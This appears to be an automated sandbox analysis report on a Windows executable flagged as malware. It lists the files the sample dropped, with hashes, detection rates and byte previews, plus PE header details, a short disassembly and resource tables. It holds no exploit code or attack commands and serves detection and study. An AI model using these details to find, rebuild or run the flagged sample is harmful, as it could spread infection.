                                                                                                                                                                                                                                                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):248887
                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999325965098303
                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                SSDEEP:6144:izWGWhOpZUSSEBHG8E+c9LyzrjUVMq3MASSN4OSTPbOSEU8:iz9WUp+S3G8+Lc9qJPBSeU8
                                                                                                                                                                                                                                                                                                                MD5:43F4AA44EB452F701158DFB7152246C3
                                                                                                                                                                                                                                                                                                                SHA1:021018918938445E0BB20F84DFBE070A8B286C3D
                                                                                                                                                                                                                                                                                                                SHA-256:19D9A85A2374674D70C66612CDF58FE4D7394816E5608BD9849FF84883540AA2
                                                                                                                                                                                                                                                                                                                SHA-512:DC7CA58103898984352E6117BE9263F711C1765B1DF6CED2CCDC79A7502C26CFF3087567937DF3B9B1FE3A0F799024ADDC130CA7C4E326A525E0F7C380D8B183
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:..5..@t..._..B..,...*...|.$..i...E.$.i~.a8*R.....h}.+.J.....&..{........2...s..T1....>...-.&....w...g. ..V8..b/qE.[..~x...[.$..7i..'/.Qo..GH)...~..C.....?!....2..{NY..?..... .;@..?...Gi.....>u..3%.(....A}.Z.!.....uE.udq.....#Z..vN...o....Q.H.tgw'....a|`o.G...8.4l2|29l..."^^_...l:....^. .'....j.K...U.......B..N...f.p.....Mj..R......+........|.u...t.j.z..0.X.T9BR.~..].>.dF........Y..P.2..W$..+<G...&.....k...U.x..Y.K..]e.........?...YF..i*]y,z..8...5....V.N...AF...@k(........g../1.D.z~.h.N;.Xg.r~....3...i>...U..h..6.....a..Ug".b.>....w.2J^..?...<...1.f......B.w.........|N4.bA.....kWY..a.z7..........#....,..4..;Cw4A..l...2.&2..em.m.J.B.qN0.....X.(..h..i..{.hk.J..E.Q3y..f#F{m.."A.k.W./.....=.zg9........r.N..'.~...pH~:"..vl.N=...p..J.0.#.:.....`..Q/w.EZ.x).F.....d.....eT`.:..../....5.....X..r7..m.9..P.RZ.z..-M.mU..)c.S.a;.:..-.h.-l^...n....C`0.>...ax...a.......x...ET)....A.....~.eP.%g.f.6..i...jJ..EX..L._ @..k.:..m.....kpR.*W.$.......z..U........
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):305152
                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.2402813999950375
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:3072:uFoo4h6KtS9wUoHaLzGyFXJ5iyArZvBE/D3oNJlCbhG1BFdi3heG1ulb6D:mb4tS946nGyFKRBEjaPCbhG1BFmTup6
                                                                                                                                                                                                                                                                                                                MD5:838DDE728F0210F3B430417A57CADCD7
                                                                                                                                                                                                                                                                                                                SHA1:BA823491F0E0A5BD33685D6AB18B21CE10DA1F78
                                                                                                                                                                                                                                                                                                                SHA-256:6F418D1BB71DC74D174F5FEC3D04492D3F09E61DC4CD4F9E361AD3EDB8AF9D13
                                                                                                                                                                                                                                                                                                                SHA-512:8A0D0F652867BA74BC88485CA179095D1B0FE168146F9DCE6C0526ABC50686FC999FA19A7BDBD8A26298ED7079B26F0E71B7E02E8D5AE077BC439C52701D3FFB
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L...2.-d.....................::.............0....@..........................0=......t..........................................<.....;..9..........................................................`I..@............................................text............................... ..`.data....8..0...N... ..............@....rsrc....9....;..:...n..............@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                Size (bytes):306176
                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.255280797294316
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:6144:/rsS9KwaWUQco8ODmuHkrr0BcGNBEm0p6:/rJ9KQUQP8w5krATBmI
                                                                                                                                                                                                                                                                                                                MD5:41C7BCD9B6084D7A61B8A54DF1A525E0
                                                                                                                                                                                                                                                                                                                SHA1:5B7EBEB8AC0AC31F42A2DF2087841ADA797CBC66
                                                                                                                                                                                                                                                                                                                SHA-256:6BEA0694893D00F8537BA95265A714077F4C7854DA105B36225D9F995F9E3514
                                                                                                                                                                                                                                                                                                                SHA-512:C74F039B22247CAF3224E2D39090D9CC627DDA14FD1FF3521CF1C7A2204D995097F82245B4A5EDBA5522BCF6CBB5719CC58691F37D2FE23DEC9496874FE5DA6D
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L....TUd................. ...::.............0....@..........................0=.............................................P$..<.....;..9..........................................................`I..@............................................text............ .................. ..`.data....8..0...N...$..............@....rsrc....9....;..:...r..............@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.2402813999950375
                                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                                                                                                                                • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                                                                                                File size:305'152 bytes
                                                                                                                                                                                                                                                                                                                MD5:838dde728f0210f3b430417a57cadcd7
                                                                                                                                                                                                                                                                                                                SHA1:ba823491f0e0a5bd33685d6ab18b21ce10da1f78
                                                                                                                                                                                                                                                                                                                SHA256:6f418d1bb71dc74d174f5fec3d04492d3f09e61dc4cd4f9e361ad3edb8af9d13
                                                                                                                                                                                                                                                                                                                SHA512:8a0d0f652867ba74bc88485ca179095d1b0fe168146f9dce6c0526abc50686fc999fa19a7bdbd8a26298ed7079b26f0e71b7e02e8d5ae077bc439c52701d3ffb
                                                                                                                                                                                                                                                                                                                SSDEEP:3072:uFoo4h6KtS9wUoHaLzGyFXJ5iyArZvBE/D3oNJlCbhG1BFdi3heG1ulb6D:mb4tS946nGyFKRBEjaPCbhG1BFmTup6
                                                                                                                                                                                                                                                                                                                TLSH:11545D03A2A1AC61E5164E368E2AC2F8661EFB508F7D77DB23546F6F09731B1C562F01
                                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..
                                                                                                                                                                                                                                                                                                                Icon Hash:4559899142551545
                                                                                                                                                                                                                                                                                                                Entrypoint:0x4095f3
                                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                Time Stamp:0x642DEF32 [Wed Apr 5 21:59:14 2023 UTC]
                                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                                Import Hash:b44ba497c89da6ff2ff257f9fae14d61
                                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                                call 00007F2658FC13BFh
                                                                                                                                                                                                                                                                                                                jmp 00007F2658FBAEEEh
                                                                                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                                                                                                cmp eax, dword ptr [004331E0h+ecx*8]
                                                                                                                                                                                                                                                                                                                je 00007F2658FBB075h
                                                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                                                cmp ecx, 2Dh
                                                                                                                                                                                                                                                                                                                jc 00007F2658FBB053h
                                                                                                                                                                                                                                                                                                                lea ecx, dword ptr [eax-13h]
                                                                                                                                                                                                                                                                                                                cmp ecx, 11h
                                                                                                                                                                                                                                                                                                                jnbe 00007F2658FBB070h
                                                                                                                                                                                                                                                                                                                push 0000000Dh
                                                                                                                                                                                                                                                                                                                pop eax
                                                                                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                mov eax, dword ptr [004331E4h+ecx*8]
                                                                                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                add eax, FFFFFF44h
                                                                                                                                                                                                                                                                                                                push 0000000Eh
                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                cmp ecx, eax
                                                                                                                                                                                                                                                                                                                sbb eax, eax
                                                                                                                                                                                                                                                                                                                and eax, ecx
                                                                                                                                                                                                                                                                                                                add eax, 08h
                                                                                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                call 00007F2658FBDB8Fh
                                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                                jne 00007F2658FBB068h
                                                                                                                                                                                                                                                                                                                mov eax, 00433348h
                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                add eax, 08h
                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                call 00007F2658FBDB7Ch
                                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                                jne 00007F2658FBB068h
                                                                                                                                                                                                                                                                                                                mov eax, 0043334Ch
                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                add eax, 0Ch
                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                call 00007F2658FBB047h
                                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                push ecx
                                                                                                                                                                                                                                                                                                                mov dword ptr [eax], ecx
                                                                                                                                                                                                                                                                                                                call 00007F2658FBAFE7h
                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                mov esi, eax
                                                                                                                                                                                                                                                                                                                call 00007F2658FBB021h
                                                                                                                                                                                                                                                                                                                mov dword ptr [eax], esi
                                                                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                                sub esp, 4Ch
                                                                                                                                                                                                                                                                                                                mov eax, dword ptr [00433354h]
                                                                                                                                                                                                                                                                                                                xor eax, ebp
                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                mov esi, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-28h], ebx
                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-24h], ebx
                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-4Ch], esi
                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-48h], ebx
                                                                                                                                                                                                                                                                                                                cmp dword ptr [esi+14h], ebx
                                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x31f900x3c.text
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3bf0000x13998.rsrc
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x49600x40.text
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x1e8.text
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                .text0x10000x31af00x31c00False0.6742207129396985data7.059424308779941IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                .data0x330000x38bacc0x4e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                .rsrc0x3bf0000x139980x13a00False0.3203622611464968data3.791689231012699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                RT_CURSOR0x3cfde00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7598684210526315
                                                                                                                                                                                                                                                                                                                RT_CURSOR0x3cff280x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4473684210526316
                                                                                                                                                                                                                                                                                                                RT_CURSOR0x3d00580xf0Device independent bitmap graphic, 24 x 48 x 1, image size 00.4625
                                                                                                                                                                                                                                                                                                                RT_CURSOR0x3d01480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.08583489681050657
                                                                                                                                                                                                                                                                                                                RT_CURSOR0x3d12200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3407039711191336
                                                                                                                                                                                                                                                                                                                RT_ICON0x3bf7000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SerbianItaly0.6538808664259927
                                                                                                                                                                                                                                                                                                                RT_ICON0x3bffa80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SerbianItaly0.4798755186721992
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c25500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SerbianItaly0.5046904315196998
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c36280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSerbianItaly0.30517057569296374
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c44d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSerbianItaly0.38673285198555957
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c4d780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSerbianItaly0.3945852534562212
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c54400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSerbianItaly0.4024566473988439
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c59a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600SerbianItaly0.13651452282157675
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c7f500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224SerbianItaly0.16791744840525327
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c8ff80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400SerbianItaly0.1901639344262295
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c99800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088SerbianItaly0.2349290780141844
                                                                                                                                                                                                                                                                                                                RT_ICON0x3c9e600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SerbianItaly0.28038379530916846
                                                                                                                                                                                                                                                                                                                RT_ICON0x3cad080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SerbianItaly0.39285714285714285
                                                                                                                                                                                                                                                                                                                RT_ICON0x3cb3d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SerbianItaly0.40173410404624277
                                                                                                                                                                                                                                                                                                                RT_ICON0x3cb9380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SerbianItaly0.22074688796680497
                                                                                                                                                                                                                                                                                                                RT_ICON0x3cdee00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SerbianItaly0.2816604127579737
                                                                                                                                                                                                                                                                                                                RT_ICON0x3cef880x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SerbianItaly0.3012295081967213
                                                                                                                                                                                                                                                                                                                RT_ICON0x3cf9100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SerbianItaly0.34131205673758863
                                                                                                                                                                                                                                                                                                                RT_STRING0x3d1d180x338dataSerbianItaly0.46480582524271846
                                                                                                                                                                                                                                                                                                                RT_STRING0x3d20500x31cdataSerbianItaly0.47738693467336685
                                                                                                                                                                                                                                                                                                                RT_STRING0x3d23700x446dataSerbianItaly0.45612431444241314
                                                                                                                                                                                                                                                                                                                RT_STRING0x3d27b80x1e0dataSerbianItaly0.48541666666666666
                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x3cff100x14data1.15
                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x3d1ac80x14data1.25
                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x3d11f00x30data1.0
                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x3c35f80x30dataSerbianItaly0.875
                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x3c9de80x76dataSerbianItaly0.6694915254237288
                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x3cfd780x68dataSerbianItaly0.7211538461538461
                                                                                                                                                                                                                                                                                                                RT_VERSION0x3d1ae00x234data0.5390070921985816
                                                                                                                                                                                                                                                                                                                DLLImport
